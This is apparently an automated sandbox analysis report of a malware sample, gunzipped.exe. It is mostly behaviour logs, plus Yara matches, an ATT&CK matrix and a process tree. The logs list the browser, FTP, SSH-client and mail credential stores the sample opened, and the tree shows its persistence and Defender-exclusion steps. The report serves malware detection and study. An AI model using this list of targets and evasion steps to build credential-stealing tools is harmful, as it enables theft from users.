                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeQueries volume information: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

Source: Yara match | File source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: gunzipped.exe PID: 6640, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7368, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7608, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000007.00000002.1966713417.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: gunzipped.exe PID: 7328, type: MEMORYSTR
Source: Yara match | File source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.gunzipped.exe.3d49970.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.gunzipped.exe.76c0000.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1735179615.0000000003D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1739547290.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\gunzipped.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\gunzipped.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Users\user\Desktop\gunzipped.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\gunzipped.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\gunzipped.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\gunzipped.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\gunzipped.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\gunzipped.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\gunzipped.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: PopPassword | 13_2_0040D069
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: SmtpPassword | 13_2_0040D069
Source: Yara match | File source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

Source: Yara match | File source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.gunzipped.exe.3d49970.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.gunzipped.exe.76c0000.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1735179615.0000000003D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1739547290.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 111 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | 2 Credentials in Registry | 1 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 2 Data from Local System | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 111 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 22 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1431964
Sample: gunzipped.exe
Start date: 26/04/2024
Architecture: WINDOWS
Score: 100

Signatures on the sample:
  Snort IDS alert for network traffic
  Found malware configuration
  Malicious sample detected (through community Yara rule)
  12 other signatures

Process tree (indentation shows parent/child; "started" edges from the graph):
  gunzipped.exe 7 (started)
    dropped: C:\Users\user\AppData\...\mPvIOxEZXJsdYp.exe, PE32
    dropped: C:\Users\user\AppData\Local\...\tmp510D.tmp, XML
    signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
    gunzipped.exe 75 (started)
      network: 45.77.223.48, ports 49737, 49738, 49741, AS-CHOOPAUS, United States
      signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
    powershell.exe 23 (started)
      signatures: Loading BitLocker PowerShell Module
      WmiPrvSE.exe (started)
